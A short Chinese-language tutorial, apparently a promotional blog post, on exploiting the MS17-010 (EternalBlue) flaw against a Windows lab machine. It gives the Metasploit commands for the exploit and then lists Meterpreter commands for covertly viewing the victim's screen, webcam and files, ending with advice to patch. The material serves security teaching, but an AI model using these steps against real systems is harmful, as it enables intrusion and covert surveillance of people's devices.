用於網絡安全教學,切勿用於不當目的!
永恆之藍
永恆之藍,安全補丁漏洞代號ms17-010。允許遠程執行惡意代碼,觸發目標主機的緩存區溢出漏洞,從而實現獲得目標系統權限!
攻擊機:kali-2020
靶機:windows
使用我們的nessus漏洞掃描器對靶機進行掃描,並查看之前掃描的漏洞報告說明:
大家看到,這裡除了ms08-067,還有我們今天要測試的ms17-010,下面就開始測試利用吧!
Ms17-010漏洞利用"入侵"
打開kali,終端下輸入msfconsole,並配置相關模塊參數。
use exploit/windows/smb/ms17_010_psexec
使用ms17-010模塊
show options
顯示需要設置的參數
set RHOSTS 192.168.31.34
設置目標靶機的ip地址
run
執行!
如果利用成功,就會建立meterpreter會話!
一旦成功利用windows xp靶機的ms17-010漏洞,靶機就會反彈一個連接tcp連接到我們的kali主機中,就會建立meterpreter會話,如圖:
實戰例子
獲得了meterpreter會話後,你就可以使用"?"查詢可以使用的用於控制機靶機的命令參數,這裡我們僅僅例舉幾個常用的伎倆。
- 比如,你可以在meterpreter會話後面輸入命令screenshare,就能實時查看對方的電腦桌面,是不是很邪惡?這裡僅僅用作測試教學哈!
- 比如,你還可以使用webcam_snap獲取對方電腦的攝像頭,實時查看,聽起來就有點毛骨悚然了。
- 最後再給一個,比如download,可以指定下載對方電腦的硬盤文件等資源,如果你在電腦確實存有自己的照片。
以上這些都是在後臺以靜默的方式進行遠控操作,原因在於我們已經利用永恆之藍獲得了靶機的所有權限。綜上所述,電腦用戶應該及時更新自己的電腦系統,打好補丁,不然下一個被“玩”的可能真的是你了!
想獲取更多學習,可以點擊《白帽黑客kali滲透實戰指南》進行深入學習。全程實戰指導,乾貨滿滿,小白也能從入門到實戰。
關注小白嘿客,一起學習,一起成長!點擊以下課程專欄,瞭解更多。